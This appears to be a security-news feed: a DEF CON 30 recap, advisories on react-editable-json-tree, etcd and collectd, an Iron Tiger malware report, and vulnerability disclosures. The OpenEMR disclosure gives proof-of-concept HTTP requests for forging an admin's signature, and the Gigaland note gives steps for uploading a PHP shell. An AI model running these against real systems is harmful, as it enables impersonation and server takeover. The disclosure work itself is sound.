After 30 years and a brief pandemic hiatus, DEF CON returns with "Hacker Homecoming," an event that put the humans behind cybersecurity first.

DEF CON — Las Vegas — Halls stuffed with hackers lined up for hours for their chance to hone their skills on the latest tech, helped along by a volunteer army of so-called "goons" — it was a hopeful place to be last weekend during DEF CON 30.

Everyone wore masks so even the immunocompromised could participate. There was a trend toward focusing on using hacker powers to protect the population from utility breaches, smart car accidents, misinformation, and more. Giving the entire conference its reputational edge were rooms buzzing with information and the kind of immediacy and potency that made it feel almost subversive — punk rock, even.

Here are just a few of the highlights Dark Reading happened to find among the organized chaos that was DEF CON 30.

**1\. Merch Madness**

The longest lines, by many hours, were those to get the latest DEF CON-branded merchandise. While some used the time to refuel with snacks, others put a little more thought into the break in the action. Take Brad Lindsley, who made his own "Linecon Bag" with a mounted gaming screen and controllers for four players.

"I was waiting in line for hours at another DEF CON and I was thinking about what I would want to do in line," he told Dark Reading.

    

Brad Lindsley shows off his Linecon bag. (Photo by Becky Bracken for Dark Reading)

**2\. IoT Village**

DEF CON 30 hackers also had the option to ply their skills on dozens of Internet of Things (IoT) devices, including the Emergency Broadcast System and a Globecomm satellite system, thanks to the work of TIVO Trevor and the rest of the team, who spent the last 90 days building the IoT common control framework (CCF).

Trevor said that this year the IoT Village made the decision to shift its emphasis because of the shifting threat landscape that now focuses on infrastructure and other IoT devices.

"We've moved away from SOHO (small offices/home offices) to IoT this year," he told Dark Reading.

    

TIVO Trevor at the DEF CON 30 IoT Village. (Photo by Becky Bracken for Dark Reading)

**3\. Sink This Battleship**

There were too many contests going on during DEF CON 30 to count. One big one was a version of Capture the Flag called "Can You Sink the Ship?" put on by Fathom5, which challenged teams of hackers to bring down their ship training module. The kickoff was preceded by more than a few rules laid out by Fathom5 CTO David Burke, who included an instruction not to tinker with the hoses underneath: "Please don't spray hydraulic fluid everywhere around the room."

    

Burke explains the ground rules of the contest. (Photo by Becky Bracken for Dark Reading)

**4\. Other Challenges Accepted**

Other, less elaborate contests included a collection of Capture the Flag versions, Red Team challenges, and even a DEF CON Scavenger Hunt.

    

One of the many contest leaderboards projected around the DEF CON Contest Village. (Photo by Becky Bracken for Dark Reading)

**5\. The Voting Village**

Noted voting-machine researcher Harri Hursti, representing the Election Integrity Foundation, brought in a collection of voting machines currently in use across the US for hackers and conspiracy theorists alike to try out and challenge their security.

Dark Reading ran into a group of hackers giving one of the US voting machines a careful look. Asked if they thought they might be able to crack into it, one of the group responded, "I don't know if we can, but it's fun thing to play with."

    

Voting machine hackers, from L to R: Wkampbel, Segzf4ult, Cole Knight, James, Semifour. (Photo by Becky Bracken for Dark Reading)

**6\. The Signage**

Even the signage spread out around DEF CON 30 was flair-forward, with an array of clever quips, dazzling digital renderings, and just straight-up art. Here is just the tiniest taste of what was on display.

    

The Chill Out Room at DEF CON had an elaborate stage for DJs and performances. (Photo by Becky Bracken for Dark Reading)

    

Signage at the lock-picking area at DEF CON. (Photo by Becky Bracken for Dark Reading)

    

Wall projection over main DEF CON 30 entrance. (Photo by Becky Bracken for Dark Reading)

**7\. Brain Hacking & Misinformation**

An entire village at this year's DEF CON was dedicated to misinformation. With phishing and social engineering still driving so many successful cyberattacks, Dr. Matthew Canham of Beyond Layer 7 gave a presentation on cognitive security, which essentially means blocking attackers from compromising the brain itself. From optical illusions to instances like Cambridge Analytica's practice of building psychographic profiles to target victims, brain hacks are here and getting more sophisticated, according to Dr. Canham.

    

Misinformation Village information screen prior to Dr. Canham's presentation. (Photo by Becky Bracken for Dark Reading)

**8\. The Traditions**

This year was Michael Bargury's debut on the DEF CON stage. That meant that before he kicked off his presentation about codeless malware, the CTO and cofounder of Zenity (and Dark Reading columnist) engaged in a DEF CON tradition... he did a shot, along with his "goon" who gave the introduction. After a few seconds and just one wince while the liquor went down, Bargury was officially inaugurated into the DEF CON speaker's club and ready to go.

    

Bargury takes the podium following his inaugural shot of courage. (Photo by Becky Bracken for Dark Reading)

DEF CON 30: Hackers Come Home to Vibrant Community

This library allows strings to be parsed as functions and stored as a specialized component, [`JsonFunctionValue`](https://github.com/oxyno-zeta/react-editable-json-tree/blob/09a0ca97835b0834ad054563e2fddc6f22bc5d8c/src/components/JsonFunctionValue.js). To do this, Javascript's [`eval`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval) function is used to execute strings that begin with "function" as Javascript. This unfortunately could allow arbitrary code to be executed if it exists as a value within the JSON structure being displayed. Given that this component may often be used to display data from arbitrary, untrusted sources, this is extremely dangerous. One important note is that users who have defined a custom [`onSubmitValueParser`](https://github.com/oxyno-zeta/react-editable-json-tree/tree/09a0ca97835b0834ad054563e2fddc6f22bc5d8c#onsubmitvalueparser) callback prop on the [`JsonTree`](https://github.com/oxyno-zeta/react-editable-json-tree/blob/09a0ca97835b0834ad054563e2fddc6f22bc5d8c/src/JsonTree.js) component should be ***unaffected***. This vulnerability exists in the default `onSubmitValueParser` prop which calls [`parse`](https://github.com/oxyno-zeta/react-editable-json-tree/blob/master/src/utils/parse.js#L30). Prop is added to `JsonTree` called `allowFunctionEvaluation`. This prop will be set to `true` in v2.2.2, which allows upgrade without losing backwards-compatibility. In v2.2.2, we switched from using `eval` to using [`Function`](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Function) to construct anonymous functions. This is better than `eval` for the following reasons: - Arbitrary code should not be able to execute immediately, since the `Function` constructor explicitly *only creates* anonymous functions - Functions are created without local closures, so they only have access to the global scope If you use: - **Version `<2.2.2`**, you must upgrade as soon as possible. - **Version `^2.2.2`**, you must explicitly set `JsonTree`'s `allowFunctionEvaluation` prop to `false` to fully mitigate this vulnerability. - **Version `>=3.0.0`**, `allowFunctionEvaluation` is already set to `false` by default, so no further steps are necessary.

**Impact**

Our library allows strings to be parsed as functions and stored as a specialized component, JsonFunctionValue. To do this, Javascript's eval function was used to execute strings that begin with "function" as Javascript. This was an oversight that unfortunately allows arbitrary code to be executed if it exists as a value within the JSON structure being displayed. Given that this component may often be used to display data from arbitrary, untrusted sources, this is extremely dangerous.

One important note is that users who have defined a custom onSubmitValueParser callback prop on the JsonTree component should be _**unaffected**_. This vulnerability exists in the default onSubmitValueParser prop which calls parse.

**Patches**

We have decided on a two-pronged approach to patching this vulnerability:

1.  Create a patch update that adds a workaround **which is not enabled by default** to preserve backwards-compatibility
2.  On the next major update, **we will enable this workaround by default**

The workaround we have decided on is adding a prop to JsonTree called allowFunctionEvaluation. This prop will be set to true in v2.2.2, so you can upgrade without fear of losing backwards-compatibility.

We have also implemented additional security measures as we know many people may not read the details of this vulnerability, and we want to do the best we can to keep you protected. In v2.2.2, we switched from using eval to using Function to construct anonymous functions. This is better than eval for the following reasons:

*   Arbitrary code should not be able to execute immediately, since the Function constructor explicitly _only creates_ anonymous functions
*   Functions are created without local closures, so they only have access to the global scope

This change has brought a _slight_ potential for breaking backwards-compatibility if users for some reason were relying on side-effects of our usage of eval, but that is beyond intended behavior, so we have decided to go ahead with this change and consider it a non-breaking change.

**Workarounds**

As mentioned above, there are a few scenarios you must consider:

If you use:

*   **Version <2.2.2**, you must upgrade as soon as possible.
*   **Version ^2.2.2**, you must explicitly set JsonTree's allowFunctionEvaluation prop to false to fully mitigate this vulnerability.
*   **Version >=3.0.0**, allowFunctionEvaluation is already set to false by default, so no further steps are necessary.

**References**

None.

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in the GitHub repo

CVE-2022-36010: Arbitrary code execution via function parsing

By Deeba Ahmed
Chinese Espionage Group called Iron Tiger (aka LuckyMouse) is targeting Windows, Linux, and macOS Users with trojanized MiMi…
This is a post from HackRead.com Read the original post: Windows, Linux and macOS Users Targeted by Chinese Iron Tiger APT Group

****Chinese Espionage Group called Iron Tiger (aka LuckyMouse) is targeting Windows, Linux, and macOS Users with trojanized MiMi Chat app installers.****

Cybersecurity firms Trend Micro and SEKOIA have identified a new malware campaign from Iron Tiger, a Chinese APT group also known as Emissary Panda, Goblin Panda Conimes, Cycldek, Bronze Union, LuckyMouse, APT27, and Threat Group 3390 (TG-3390).

The China-linked cyberespionage group is targeting Windows, Linux, macOS, and iOS users through trojanized versions of MiMi chat app installers. The primary targets of Iron Tiger in this campaign were located in Taiwan and the Philippines.

Trend Micro could identify one of the victims, a Taiwan-based gaming development firm, while overall, thirteen entities were targeted.

**Detailed Analysis of Iron Tiger Spying Campaign**

The group previously launched politically motivated, profiteering, and intelligence-gathering-driven cyberespionage campaigns. For instance, **in June 2018**, Iron Tiger APT was caught targeting a national data center of an unknown Central Asian country using a **watering hole attack**.

**In March 2018**, the same group was identified in a cyber attack against Pakistani government infrastructure. In April 2021, Iron Tiger APT was once again caught spying on Vietnam’s government and military organizations with FoundCore RAT.

Iron Tiger’s latest campaign was identified in June after Trend Micro researchers downloaded infected versions of MiMi’s iOS version.

In this campaign, Iron Tiger’s modus operandi involves compromising the MiMi Chat app servers to infect unsuspecting users’ devices. The app uses ElectronJS cross-platform framework for its desktop version.

**According to** Sekoia, The campaign has all elements of a supply chain attack since the app’s backend servers that host MiMi’s legit installers are controlled by the attackers. The modified MiMi installers download an in-memory, custom backdoor called **HyperBro** on the targeted device. 

**Attackers Constantly Modified Chat App Installers to Deliver Malware**

Researchers confirmed that Iron Tiger started accessing MiMi’s host server in November 2021. when the developers released new versions of the MiMi chat app, the malware operators further exploited their access to host servers to modify the installers quickly.

It only took one and a half hours for the malware operators to alter the legit installers, while for older versions, it took them a day only to perform the modification.

**Malware Capabilities**

According to their **blog post**, Trend Micro discovered various rshell samples, including one that targeted Linux. Researchers analyzed the iOS sample and identified that it fetched rshell backdoor for macOS and can collect system data and transmit it to a C2 server. It could also execute commands from the attackers and send results to the same C2 server.

Further probe revealed that the backdoor could open/close/execute commands in a shell, read, delete, or close files, list directories, and prepare files for uploading/downloading. As per the researchers, the oldest sample was uploaded in June 2021.

**Why the Backdoored App Didn’t Raise Suspicion**

Researchers pointed out that the MiMi chat app’s backdoored versions went unnoticed and didn’t raise any red flags because the legit installers weren’t signed. This means users would go through multiple system warnings when installing the app.

1.  **Old crypto malware makes come back, hits Windows, Linux devices**
2.  **CrossRAT keylogging malware targets Linux, macOS & Windows PCs**
3.  **Multi-platform SysJoker backdoor Hit Windows, macOS, Linux Devices**
4.  **ElectroRat crypto-stealing malware hits macOS, Windows, Linux devices**
5.  **Chinese Hackers Distributing Nim language Malware in SMS Bomber Tool**

Windows, Linux and macOS Users Targeted by Chinese Iron Tiger APT Group

Improper Access Control in GitHub repository openemr/openemr prior to 7.0.0.1.

**Description**

I observed that users can view any user's signature by changing their user parameter to other's user parameter. By the same way users can create/delete/update other's signature in create signature function.

**View/Get other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  Use Current "  to view your own signature. Intercept this request with Burpsuite. ( Ensure you created your signature before).
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send request, you will see the signature of admin is sent in response.
    

**Create/Update/Delete other's signature:**

    1. Login to an account (I use account receptionist).
    2. Click "Portal > Portal Audits > Home > Signature on File >  {Sign your signature} > Sign and Save "  to create your own signature. Intercept this request with Burpsuite. 
    3. Modify user parameter to other's user parameter (I use admin's user parameter which has value is 5) 
    4. Send this request.
    5. Login with admin account. You will see admin's signature was created.
    

**Proof of Concept****View/Get other's signature:**

    POST /openemr/portal/sign/lib/show-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 61
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Accept: application/json, text/plain, */*
    Content-Type: application/json
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"type":"admin-signature"}
    

**Create/Update/Delete other's signature:**

    POST /openemr/portal/sign/lib/save-signature.php HTTP/1.1
    Host: demo.openemr.io
    Cookie: OpenEMR=HshnpRzk09lylHKsiGyGQrZDxOUlKlsI2bn-wO0t9g-n8P4h
    Content-Length: 39622
    Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    Sec-Ch-Ua-Mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Sec-Ch-Ua-Platform: "Windows"
    Content-Type: application/json
    Accept: */*
    Origin: https://demo.openemr.io
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: https://demo.openemr.io/openemr/portal/patient/provider
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    {"pid":"0","user":"5","is_portal":0,"signer":"Barbara Wallace","type":"admin-signature","output":"content of signature image in base64"
    

**Impact**

Attacker can get/create/update any user's signature including admin's signature. As a result, he/she can impersonate admin or anyone to perform actions.

**Occurrences**

CVE-2022-2824: User can do all actives with  other's signature (view, get, create, update, delete,...) in openemr

Gigaland NFT Marketplace version 1.9 suffers from remote shell upload and ETH private key disclosure vulnerabilities.

    # Exploit Title: Gigaland NFT marketplace Shell upload and ETH private key leak # Google Dork: N/A# Date: 14/8/2022# Exploit Author: Sohel Yousef   https://www.linkedin.com/in/sohel-yousef-50a905189/# Software Link: https://gigaland.io/# Version: 1.9# Category: webapps1. Sell Upload after connectiong your wallet to the site go to edit profile section on the linklocalhost/artist/accountupload your shell in php format with no secuirty your shell well be in this directionstorage/artist/profile/ ++ you can Inspect Element the edit profile page to have the direct link 2. Private key leak this link localhost//resources/privateJs/transfer.jshave the private key for the ethereum account const addressFrom = receiverAddress;const privKey = '9f09d101c +++  HIDDEN ++++++ ac7bea0db0c25d2b5a3'async function transfer(addressto, data, history_id) {    debugger;    const web3js = new Web3(rpcURL);    const contract = new web3js.eth.Contract(trabi, trcontractAddress, {});    const nonce = await web3js.eth.getTransactionCount(addressFrom, 'latest'); //get latest nonce

Gigaland NFT Marketplace 1.9 Shell Upload / Key Disclosure

Red Hat Security Advisory 2022-6061-01 - The etcd packages provide a highly available key-value store for shared configuration. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.2 (etcd) security update  
Advisory ID:       RHSA-2022:6061-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6061  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-21698 CVE-2022-30631  
====================================================================  
1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform 16.2  
(Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.2 - ppc64le, x86_64

3. Description:

The etcd packages provide a highly available key-value store for shared  
configuration.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.2:

Source:  
etcd-3.3.23-10.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-10.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-10.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-10.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-10.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo20tzjgjWX9erEAQiX3w/7BqJylR0wjzoTZyhtzLAo5EtOYCcoBmzH  
IhBuvxUmBgM8IvnqedPBGa17v5+7OsZvJKUqkZjfnIL9MFdrYSiaqHR1T4mS0Qsu  
Q830AYyFU2sTSa22AmR03Xhfr4e3WXi+gYnR9dPqxuRvr2gaVMZ0R150kQSr+ez1  
ZQ+58lv2krhnUZK1qznyxDRUSauRqRgQvjNjhVipA5q3mCDu0FuJkyEa+65MIyP7  
4yTXRspx4Uk2fCIhm+RNRJPZTIG2t9vuX1tjozsoi3x6yiYGTMKh+OBGB2w8QIig  
IOPZDlcbqh9/XZhpWo0sYLeBqHepOX3KE46q/40BhsjbOoKOdm7A4P81zxjNJ1lU  
BbsKSEjeVQtEXAmLM1j0RNxAMYBfJJWS1Cu4mB3/M6kI2+gB6BzoPiPiZDt/5QU0  
loujArrUdeEnWNy65JJ9fVhKNf7iJ5NAf8GHE9AEPmwQSXSIuf5g5z8N1zHGF/7x  
O/uuHfx5XEBLkjMEpkSatxZ/RgMOvbKOQRMGuFMq621BOFsjsh7hyzeo3LJC5e1z  
75j5cXzd0VVLsr19HrB7HoinAQZvFALf5Qw0Uqd1Abcr+wPaN32NPjb+WNMU987/  
1bocpSrFlbcycLN7CH1AfVR6XdNSctdzAbGv2AwLcuqsro5e5QEEPZSI1/yMLc9B  
KZvTwvCKViQÔ+p  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6061-01

Red Hat Security Advisory 2022-6065-01 - Collectd plugin for gathering resource usage statistics from containers created with the libpod library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.1 (collectd-libpod-stats) security update  
Advisory ID:       RHSA-2022:6065-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6065  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-30631  
====================================================================  
1. Summary:

An update for collectd-libpod-stats is now available for Red Hat OpenStack  
Platform 16.1 (Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - ppc64le, x86_64

3. Description:

Collectd plugin for gathering resource usage statistics from containers  
created with the libpod library.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
collectd-libpod-stats-1.0.4-2.el8ost.src.rpm

ppc64le:  
collectd-libpod-stats-1.0.4-2.el8ost.ppc64le.rpm

x86_64:  
collectd-libpod-stats-1.0.4-2.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo28dzjgjWX9erEAQiJIw//dp8mPmJul3+Vqcelyz+HrEFJwYPSfefl  
3mr8VZqvtPdbufEe6L1kgpdQ3aOx8iYOHa7mXUA+NXSYUsZ9IquX5gLtF+9yaVcr  
qxyUiYkbokbQv1kDu39bRK3dKp0OquIAErw0FHLGap8D9br9EuJ6BZSleb/eP31A  
84GA8uQ+N7VQhrMY/XYwaNmJrLXrnT/nzxYSQIThEE1jDllZW8QpbS8ck1IgP+8Q  
yLPA9pMh2zkl3y0ovYDaZDUZTIrOT6gnRjnN0g4cY/50dYSKezwOfSrjO0mjvbvD  
ln+EXKal4MaxZxjSSO+YxoKOL3DZNj/BLyv38zw3n7HOjneApyZS+npNHRWLFZVr  
sR/0x1cT+xqNl04df70EJSECl7oPXodAcpopMgTzokDwOgpPsJlmvF2M0LSNL/NL  
O4Lx+1d329Fp3OCUCjXXl0pmspXCq7Bo1qjCh4KTdC1AdM+zhGPIFACEPczbqwz7  
NSrhI78OgHcuIq4JPmQMjB+WKRaKngwK7pv9kSysoKAIsvJyi6xzzlOJBUyUsquZ  
73427OdulFyPBLFi5sIXNiI8m9lAxxAG+SNAIF3LmQYgU+rpeaminRsiviWh9y7x  
ktR/vfTMjWzFJVsZ62+0XehI4CZynWRdtSWBD+C7rXTzoMrJR6loB1rJHGIu1CS0  
EuBqabZ4KYM=dw2O  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6065-01

Red Hat Security Advisory 2022-6062-01 - Collectd plugin for gathering resource usage statistics from containers created with the libpod library.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.2 (collectd-libpod-stats) security update  
Advisory ID:       RHSA-2022:6062-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6062  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-30631  
====================================================================  
1. Summary:

An update for collectd-libpod-stats is now available for Red Hat OpenStack  
Platform 16.2 (Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.2 - ppc64le, x86_64

3. Description:

Collectd plugin for gathering resource usage statistics from containers  
created with the libpod library.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.2:

Source:  
collectd-libpod-stats-1.0.4-2.el8ost.src.rpm

ppc64le:  
collectd-libpod-stats-1.0.4-2.el8ost.ppc64le.rpm

x86_64:  
collectd-libpod-stats-1.0.4-2.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo2+9zjgjWX9erEAQifBQ/9FNIwjzEhXZMoULDnpPWA5iiRmfdmd6s9  
WVmP2w6qY4rrKF7hSItPz0IxzXBTOklId42E12nF3zIArzTqKKOag0oOIeiAXvdZ  
QOcX/KOFQC9jF7iBxU4J0uYk8wfUqxOCCITLKojHEt8pCOpH6aiGTPFM9ZpFS9HF  
mmF4YJUB9/1XtsjQKuqCPQHrFZHWtJUW8TBt48374F2WvC4QzCVFxfJx05d6SGvD  
NWyMFyI3ciyGMflGe6DZiFjPlqY0idfhaTobNS+6v73mLfPLAARtZyEqezxFawyi  
oR/vF4/Mcv2wcYXfM+YX5VXVawgN+Xqw8OAIbujUcEXhhK/cEYHhm5SlYEP0l7xS  
/OvZ+BZOZ1W2cHBxRgME6RCbdYQ8z0ZEMEmMHVGuJzd/t0OX6nSYfx9GeuIQe8gr  
UMCLtDNZJ06fLgr0bdJ2x8EeY+ulJWLco5F+Y/f4Jq5dX3Aj+zJE9MdVOJI768N1  
BkHE0OaFklYprz4ZZu3RrIRK7OIurDpICDK/K8E/WHp08bcIfwLJdE/Wi0PHH7M/  
LTAoLwPBGlP+zqQE2dPlaBp0lEDePm+w4gYVO9vfwa0jsU7UQ0dH/ptePcPhUO4a  
5Rn6creMaKbQrLKZYjhRBzg4E2vAPjaqfEc7NftSZvn4B8pfX1pVEUxbn9ZsWSBZ  
hPFw3Kwo1GY=EOoO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6062-01

Red Hat Security Advisory 2022-6066-01 - The etcd packages provide a highly available key-value store for shared configuration. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform 16.1 (etcd) security update  
Advisory ID:       RHSA-2022:6066-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6066  
Issue date:        2022-08-15  
CVE Names:         CVE-2022-21698 CVE-2022-30631  
====================================================================  
1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform 16.1  
(Train).

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - ppc64le, x86_64

3. Description:

The etcd packages provide a highly available key-value store for shared  
configuration.

Security Fix(es):

* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)

* prometheus/client_golang: Denial of service using  
InstrumentHandlerCounter (CVE-2022-21698)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter  
2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
etcd-3.3.23-10.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-10.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-10.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-10.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-10.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-10.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-21698  
https://access.redhat.com/security/cve/CVE-2022-30631  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYvo23NzjgjWX9erEAQhJ9w//RBbgT6wIwGU09lyTf4OIK5aYeDodCA1W  
FJSxMuBJYrCQx0esUTlqBruCVuqe4YgGjJ/9HgzkRCPbEIXGclYFz6/1FkZCOTmu  
OvT2km1xSCs+EggHOJQ6fJIhpqF1qll1/W2zAEmd0k4AxBRuWRVGIwqkKw6G9Ep6  
Qs7g0/mni1xqIe+sX2Pw2stZCGxb1GZ1x5kXrVfAO/Hp2/6HxEun4jBKuLJ9bneb  
PHsS3QzBARhUHE7Yd+UQ8awbQFXK5Hm/vx/aF3nTzgDy5fWTMh6K6+N059TE1Vdw  
HdqjiSleqWpN4cKmu1xFOvjXSfoSgbJ5KmFNQR3LSj+v+sQSyYItdqjHo8u4pO8D  
rcj1MC30M3IcMBahmEiEZIpaImfERCAM0muGzQON9d1FRiND5WQW8tLBMLRcLXLF  
0MA0xFaayNZknGINoVyxoC5LwUcW8wrNkaZEADVtW9N4DwHzGAtlq6pGUNJbMRKk  
